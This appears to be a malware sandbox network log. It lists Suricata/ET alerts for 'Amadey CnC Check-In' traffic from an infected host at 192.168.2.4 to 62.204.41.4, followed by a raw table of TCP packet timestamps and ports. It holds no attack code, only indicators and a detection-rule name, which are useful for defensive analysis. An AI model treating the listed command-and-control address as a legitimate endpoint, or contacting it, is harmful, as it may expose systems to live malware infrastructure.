                            192.168.2.462.204.41.449796802027700 02/08/23-17:37:52.334940TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449850802027700 02/08/23-17:38:10.307889TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450231802027700 02/08/23-17:39:54.903522TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449777802027700 02/08/23-17:37:46.698035TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449866802027700 02/08/23-17:38:16.739355TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450101802027700 02/08/23-17:39:20.831047TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449736802027700 02/08/23-17:37:36.780328TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449980802027700 02/08/23-17:38:49.476222TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450272802027700 02/08/23-17:40:04.969177TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450088802027700 02/08/23-17:39:17.657424TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450314802027700 02/08/23-17:40:17.451507TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450142802027700 02/08/23-17:39:31.136437TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450183802027700 02/08/23-17:39:43.402506TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450047802027700 02/08/23-17:39:07.710715TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449760802027700 02/08/23-17:37:42.602798TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450122802027700 02/08/23-17:39:26.248693TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450039802027700 02/08/23-17:39:05.758232TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450235802027700 02/08/23-17:39:55.857099TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450278802027700 02/08/23-17:40:06.451503TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450217802027700 02/08/23-17:39:51.538233TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450140802027700 02/08/23-17:39:30.667124TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450296802027700 02/08/23-17:40:10.763882TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449910802027700 02/08/23-17:38:27.414676TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449742802027700 02/08/23-17:37:38.312283TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449968802027700 02/08/23-17:38:46.334914TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450057802027700 02/08/23-17:39:10.183850TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449732802027700 02/08/23-17:37:35.795795TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449888802027700 02/08/23-17:38:22.112698TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449809802027700 02/08/23-17:37:56.735328TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449827802027700 02/08/23-17:38:01.010259TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449883802027700 02/08/23-17:38:20.884072TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449845802027700 02/08/23-17:38:08.786241TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450173802027700 02/08/23-17:39:38.673124TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450049802027700 02/08/23-17:39:08.183040TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450150802027700 02/08/23-17:39:33.073470TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449822802027700 02/08/23-17:37:59.825964TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450227802027700 02/08/23-17:39:53.949663TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450286802027700 02/08/23-17:40:08.361527TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449770802027700 02/08/23-17:37:45.036009TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450268802027700 02/08/23-17:40:03.929437TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450245802027700 02/08/23-17:39:58.312452TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449900802027700 02/08/23-17:38:24.979265TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450104802027700 02/08/23-17:39:21.557053TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449704802027700 02/08/23-17:37:26.622936TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450067802027700 02/08/23-17:39:12.587874TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449817802027700 02/08/23-17:37:58.632623TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450263802027700 02/08/23-17:40:02.709618TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450085802027700 02/08/23-17:39:16.942706TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450145802027700 02/08/23-17:39:31.864006TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449722802027700 02/08/23-17:37:31.299531TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450300802027700 02/08/23-17:40:11.733230TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450323802027700 02/08/23-17:40:19.611218TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449697802027700 02/08/23-17:37:24.898911TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449835802027700 02/08/23-17:38:03.284886TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449832802027700 02/08/23-17:38:02.498158TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450163802027700 02/08/23-17:39:36.189853TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450059802027700 02/08/23-17:39:10.667915TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450102802027700 02/08/23-17:39:21.074270TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450273802027700 02/08/23-17:40:05.210080TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450310802027700 02/08/23-17:40:15.001847TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450313802027700 02/08/23-17:40:16.587698TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449860802027700 02/08/23-17:38:15.268343TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450095802027700 02/08/23-17:39:19.370464TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450276802027700 02/08/23-17:40:05.953011TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449865802027700 02/08/23-17:38:16.496280TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450209802027700 02/08/23-17:39:49.582809TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449804802027700 02/08/23-17:37:55.542967TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450098802027700 02/08/23-17:39:20.119029TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450132802027700 02/08/23-17:39:28.720657TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450016802027700 02/08/23-17:39:00.164305TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449978802027700 02/08/23-17:38:48.712592TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449773802027700 02/08/23-17:37:45.744566TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449937802027700 02/08/23-17:38:35.731319TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450248802027700 02/08/23-17:39:59.059890TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450265802027700 02/08/23-17:40:03.200849TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450135802027700 02/08/23-17:39:29.463987TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450207802027700 02/08/23-17:39:49.091510TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449807802027700 02/08/23-17:37:56.250217TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450087802027700 02/08/23-17:39:17.420203TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449951802027700 02/08/23-17:38:39.117123TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449759802027700 02/08/23-17:37:42.369299TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450107802027700 02/08/23-17:39:22.315655TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449909802027700 02/08/23-17:38:27.165242TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450130802027700 02/08/23-17:39:28.215637TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449695802027700 02/08/23-17:37:24.659551TCP2027700ET TROJAN Amadey CnC Check-In4969580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449837802027700 02/08/23-17:38:06.766539TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449873802027700 02/08/23-17:38:18.447657TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450237802027700 02/08/23-17:39:56.348459TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450029802027700 02/08/23-17:39:03.307263TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449878802027700 02/08/23-17:38:19.667672TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450160802027700 02/08/23-17:39:35.471399TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449763802027700 02/08/23-17:37:43.325860TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449769802027700 02/08/23-17:37:44.792125TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449852802027700 02/08/23-17:38:10.929233TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450293802027700 02/08/23-17:40:10.028487TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449702802027700 02/08/23-17:37:26.146506TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449858802027700 02/08/23-17:38:14.073652TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450143802027700 02/08/23-17:39:31.370431TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450214802027700 02/08/23-17:39:50.800451TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450299802027700 02/08/23-17:40:11.500143TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450125802027700 02/08/23-17:39:26.996304TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450036802027700 02/08/23-17:39:05.033130TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450232802027700 02/08/23-17:39:55.156269TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450321802027700 02/08/23-17:40:19.144641TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450054802027700 02/08/23-17:39:09.433030TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449824802027700 02/08/23-17:38:00.290375TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449919802027700 02/08/23-17:38:29.584683TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449797802027700 02/08/23-17:37:52.616336TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450309802027700 02/08/23-17:40:14.212818TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449913802027700 02/08/23-17:38:28.132055TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449735802027700 02/08/23-17:37:36.528447TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449791802027700 02/08/23-17:37:50.073108TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449931802027700 02/08/23-17:38:34.030037TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449842802027700 02/08/23-17:38:07.992649TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449998802027700 02/08/23-17:38:55.809592TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449779802027700 02/08/23-17:37:47.176231TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449975802027700 02/08/23-17:38:47.996045TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450115802027700 02/08/23-17:39:24.252625TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450020802027700 02/08/23-17:39:01.119660TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450026802027700 02/08/23-17:39:02.587070TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449886802027700 02/08/23-17:38:21.612683TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450008802027700 02/08/23-17:38:58.198992TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450204802027700 02/08/23-17:39:48.373919TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450092802027700 02/08/23-17:39:18.634986TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450181802027700 02/08/23-17:39:42.912009TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450270802027700 02/08/23-17:40:04.450424TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449941802027700 02/08/23-17:38:36.694908TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449947802027700 02/08/23-17:38:38.153087TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449740802027700 02/08/23-17:37:37.821742TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449781802027700 02/08/23-17:37:47.651800TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449870802027700 02/08/23-17:38:17.723085TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449929802027700 02/08/23-17:38:33.000268TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450258802027700 02/08/23-17:40:01.487832TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449988802027700 02/08/23-17:38:53.036500TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449893802027700 02/08/23-17:38:23.319978TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450255802027700 02/08/23-17:40:00.759372TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449899802027700 02/08/23-17:38:24.742098TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450169802027700 02/08/23-17:39:37.723515TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449728802027700 02/08/23-17:37:34.522765TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449982802027700 02/08/23-17:38:50.300928TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450010802027700 02/08/23-17:38:58.684721TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450077802027700 02/08/23-17:39:14.979085TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450166802027700 02/08/23-17:39:36.964836TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450316802027700 02/08/23-17:40:17.940023TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450191802027700 02/08/23-17:39:45.295486TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.462.204.41.4
                            Timestamp    Source Port    Dest Port    Source IP    Dest IP
                            Feb 8, 2023 17:37:29.744113922 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.810787916 CET804971662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:29.810827971 CET804971762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:29.810918093 CET4971680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.810962915 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.811372995 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.873954058 CET804971762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:29.876492977 CET804971762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:29.876696110 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.993894100 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:29.995580912 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.055876970 CET804971862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.059684038 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.059776068 CET804971762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.060142994 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.060200930 CET4971780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.123681068 CET804971862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.126377106 CET804971862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.128381968 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.242542982 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.243669033 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.303884983 CET804971862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.307857990 CET804971962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.308022976 CET4971880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.308108091 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.308623075 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.373961926 CET804971962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.377908945 CET804971962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.381918907 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.492532015 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.493253946 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.554977894 CET804972062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.555032969 CET804971962.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.555234909 CET4971980192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.556001902 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.557563066 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.623899937 CET804972062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.623967886 CET804972062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.624157906 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.844114065 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.844984055 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.908672094 CET804972062.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.908859968 CET4972080192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:30.910125017 CET804972162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:30.910270929 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.055128098 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.118320942 CET804972162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.121349096 CET804972162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.121491909 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.232505083 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.233249903 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.293844938 CET804972262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.294068098 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.295133114 CET804972162.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.295283079 CET4972180192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.299530983 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.360061884 CET804972262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.361973047 CET804972262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.362123013 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.542449951 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.550767899 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.603200912 CET804972262.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.603369951 CET4972280192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.612552881 CET804972362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.612756014 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.619066000 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.680697918 CET804972362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.682921886 CET804972362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.683130026 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.854939938 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.855802059 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.916743994 CET804972362.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.916939020 CET4972380192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.918199062 CET804972462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:31.918334007 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:31.965739965 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.028412104 CET804972462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:32.030860901 CET804972462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:32.031085968 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.834224939 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.848133087 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.896939993 CET804972462.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:32.900065899 CET4972480192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.909742117 CET804972562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:32.909941912 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.936275959 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:32.997843027 CET804972562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.002540112 CET804972562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.003134012 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.136379004 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.137111902 CET4972680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.197782040 CET804972662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.197793007 CET804972562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.197895050 CET4972580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.198313951 CET4972680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.198313951 CET4972680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:33.258934975 CET804972662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.263086081 CET804972662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:33.263294935 CET4972680192.168.2.462.204.41.4
